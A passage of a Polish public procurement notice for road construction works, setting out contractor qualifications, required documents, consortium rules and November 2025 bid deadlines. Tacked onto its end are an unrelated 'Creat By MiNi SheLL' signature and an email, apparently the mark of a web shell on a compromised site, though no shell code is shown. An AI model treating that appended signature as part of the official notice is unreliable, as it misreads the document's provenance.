określonemu przez Zamawiającego.<br/>W przypadku posługiwania się przez wykonawcę cudzym potencjałem, wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonują roboty budowlane lub usługi, do realizacji, których te zdolności są wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby, składa wraz z ofertą , zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji tego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie , będzie dysponował niezbędnymi zasobami tych podmiotów.<br/><br/>b) Warunek zostanie spełniony jeżeli Wykonawca wykaże / dla części 1, części 2 i części 3/, że będzie dysponował jedną osobą zdolną do wykonania zamówienia, która będzie uczestniczyć w wykonywaniu zamówienia pełniąc funkcję kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej bez ograniczeń, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a które uprawniają do pełnienia tych funkcji w wymaganym zakresie. <br/>Uwaga: <br/>Uprawnienia, o których mowa powyżej, powinny być zgodne z ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2023 r., poz. 682 ze zm.) lub ważne odpowiadające im kwalifikacje, nadane na podstawie wcześniej obowiązujących przepisów upoważniające do kierowania robotami budowlanymi w zakresie objętym niniejszym zamówieniem. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz. U. z 2023 r., poz. 334). W przypadku osób będących obywatelami państw członkowskich UE, Konfederacji Szwajcarskiej lub państw członkowskich (EFTA) – stron umowy o Europejskim Obszarze Gospodarczym – prawo do wykonywania samodzielnych funkcji technicznych w budownictwie na terytorium RP winno być potwierdzone odpowiednią decyzją o uznaniu kwalifikacji zawodowych lub prawa do świadczenia usług transgranicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2) w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia, Zamawiający zamiast podmiotowych środków dowodowych żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, w którym mowa w art.125 ust.1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego dla części 1, części 2 i części 3.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu należy przedłożyć:<br/> - wykaz robót budowlanych dla części 1, części 2 i części 3 – załącznik nr 5 ( warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi podpisany przez osobę uprawnioną wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich pięciu lat prze upływem terminu składania ofert a jeżeli okres działalności jest krótszy- w tym okresie wraz z podaniem ich rodzaju i wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz, którego roboty budowlane były wykonane, a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty, lub potwierdzenie wykonania roboty budowlanej <br/>- wykaz osób dla części 1, części 2 i części 3 (na potwierdzenie spełnienia warunku należy przedstawić wykaz osób skierowanych do realizacji zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami podpisany przez osobę uprawniona sporządzony na podstawie załącznika nr 6;<br/> - dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 500 000, 00 zł ( np. polisa ubezpieczeniowa opłacona)- dla części 1 oraz 200 000,00 zł dla części 2 i części 3<br/> <br/><br/> 3) Dokumenty podmiotów zagranicznych:<br/>- Informacja z odpowiedniego rejestru lub inny równoważny dokument ( jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art.108 ust.1 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed złożeniem <br/>- dokument potwierdzający ze nie otwarto jego likwidacji – jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania , potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 3 miesiące przed złożeniem</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 2.	Do oferty, w celu wstępnego wykazania spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia, Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1) oświadczenie dotyczące przesłanek wykluczenia z postępowania ( oświadczenie należy wypełnić i podpisać przez osoby( osobę) uprawnioną - załącznik nr 2<br/>2) oświadczenie dotyczące spełniania warunków udziału w postępowaniu ( oświadczenie wypełnić i podpisać przez osoby(osobę) uprawniona – załącznik nr 3<br/>3) klauzula informacyjna RODO - oświadczenie składane na druku oferty<br/>4) pełnomocnictwo z art.58 ust.2 ustawy, – Pzp ( jeśli dotyczy)<br/> <br/>5) pełnomocnictwo dla osoby / osób podpisującej ofertę – pełnomocnictwo dla osoby/ osób podpisującej ofertę, jeżeli nie figurują one w odpisie z właściwego rejestru. Pełnomocnictwo powinno być złożone w formie oryginału<br/>6) Wykaz rozwiązań równoważnych – ( jeśli dotyczy) wykonawca, który powołuje się na rozwiązania równoważne , jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem i normami. Dokument musi być złożony w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby upoważnionej do reprezentacji<br/>7) zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993r. o zwalczaniu nieuczciwej konkurencji. Nie można zastrzec informacji, o których mowa w art.222 ust.5 ustawy Pzp. Jeśli oferta zawiera dokumenty, co których wykonawca zastrzegł, że nie mogą być ujawnione- wówczas oferta powinna być sporządzona w sposób umożliwiający Zamawiającemu udostępnienie dokumentów ( z wyjątkiem określonych w art.18 ust.3 ustawy Pzp) wszystkim zainteresowanym. Dokument musi być złożony w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby upoważnionej do reprezentacji<br/>8) zobowiązanie podmiotu udostępniającego zasoby ( w przypadku, gdy wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) w takim przypadku należy również złożyć oświadczenie podmiotu udostępniającego o braku podstaw do wykluczenia oraz o spełnieniu warunków.<br/>Zamawiający żąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 118 ustawy Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów, o których mowa art. 108 ust. 1 ustawy Pzp jak również spełnia warunki udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na zasoby podmiotu udostępniającego oraz art. 7 ust 1 ustawy z dnia 13 kwietnia 2022r o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2025r., poz. 514)<br/>Wykonawca, który składając ofertę nie polegał na zdolnościach lub sytuacji podmiotów udostępniających zasoby nie może – po upływie terminu składania – zmienić decyzji i skorzystać z tej możliwości (art. 123 ustawy PZP). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają pełnomocnictwo do reprezentowania ich zgodnie z art.58 ust.2 ustawy Pzp. Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli dokument został sporządzony w postaci papierowej i opatrzony własnoręcznym podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym poświadczającym zgodność odwzorowania z dokumentem w postaci papierowej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym osoby posiadającej uprawnienia notariusza.<br/><br/><br/><br/><br/>W przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia ( konsorcja, spółki cywilne), dokumenty lub oświadczenia potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również podmiot udostepniający swoje zasoby składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć zgodnie z art.117 ust.4 ustawy Pzp oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni z nich. Oświadczenie należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Wszelkie zmiany zostały określone w załączniku 7a.7b,7c <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-06 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mykanow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-06 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dodatkowe informacje zawiera SWZ i załączniki

Creat By MiNi SheLL
Email: jattceo@gmail.com